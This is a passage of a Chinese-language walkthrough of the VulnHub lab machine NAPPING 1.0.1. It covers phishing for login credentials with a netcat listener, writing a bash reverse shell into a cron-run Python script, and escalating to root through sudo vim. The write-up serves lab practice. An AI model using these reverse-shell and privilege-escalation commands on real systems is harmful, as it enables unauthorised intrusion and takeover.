vulnhub靶场|NAPPING: 1.0.1( 二 )

然后将制作的upfine.html页面和get_info.html页面放入到kali中的一个目录下并开启web服务:python -m http.server 80,同时开启对6688端口的监听:nc -lvvp 6688,然后将http://192.168.1.12/upfine.html地址进行提交,监听窗口成功获得账户名和密码(%40是@):daniel/C@ughtm3napping123 。

vulnhub靶场|NAPPING: 1.0.1

文章插图
 ssh远程登录:
获得账户密码之后采用xshell进行远程登录 。
vulnhub靶场|NAPPING: 1.0.1

文章插图
提权:
ssh登录查看id时发现其属于administrators组,因此查一下此用户组下可以运行的程序,命令:find / -group administrators 2>/dev/null,发现/home/adrian/query.py文件 。
vulnhub靶场|NAPPING: 1.0.1

文章插图

vulnhub靶场|NAPPING: 1.0.1

文章插图
发现site_status.txt文件每两分钟写入一次,就表明query.py每两分钟执行一次,因此我们就可以写入反弹shell的脚本来让query.py脚本进行执行,获取更高的权限的shell 。
vulnhub靶场|NAPPING: 1.0.1

文章插图
在/home/daniel下写入shell.sh文件,文件内容如下:
#!/bin/bashbash -c 'bash -i >& /dev/tcp/192.168.1.12/8899 0>&1'然后在query.py文件中添加对shell.sh脚本的执行,内容如下:
import osos.system('/usr/bin/bash /home/daniel/shell.sh')
vulnhub靶场|NAPPING: 1.0.1

文章插图
在kali端开启对8899端口的监听,成功获取到adrina用户的shell权限 。
vulnhub靶场|NAPPING: 1.0.1

文章插图
 VIM提权:
在adrian用户的shell里执行sudo -l发现vim权限可以不需要root密码即可执行,那就使用vim直接写入shell,命令:sudo vim -c ':!/bin/bash',成功获取root权限shell 。
vulnhub靶场|NAPPING: 1.0.1

文章插图

vulnhub靶场|NAPPING: 1.0.1

文章插图
通过:python3 -c 'import pty;pty.spawn("/bin/bash")'升级下shell 。
vulnhub靶场|NAPPING: 1.0.1

文章插图
【vulnhub靶场|NAPPING: 1.0.1】

经验总结扩展阅读